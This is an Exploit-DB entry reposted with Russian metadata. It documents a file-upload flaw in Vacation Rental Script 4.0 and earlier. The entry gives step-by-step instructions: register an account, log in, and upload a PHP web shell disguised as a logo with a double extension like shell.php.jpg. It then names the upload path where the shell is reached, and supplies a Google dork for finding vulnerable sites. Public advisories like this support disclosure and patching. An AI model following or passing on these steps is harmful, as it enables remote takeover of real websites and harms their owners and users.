- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15793
- Проверка EDB
-
- Пройдено
- Автор
- BR0LY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-12-20
Код:
Script Name: Vacation Rental Script <= 4.0
Site: http://www.vacationrentalscript.com/
Bug: Upload Shell
Found: Br0ly
google dork: "2006 - 2009 Vacation Rental Script" BraZIL!!
You need register a account first so:
Signup: http://server/signup
Cheek your email for login and password
So login in:
http://server/members/login
After login:
Go to:
http://server/members/profile
at the bottom of the page you can upload a logo why not a lithe and nice
shell?
Upload a shell type: shell.php.jpg or shell.php.jpeg
after upload:
http://server/public/upload/logos/youshell.php.jpg- Источник
- www.exploit-db.com
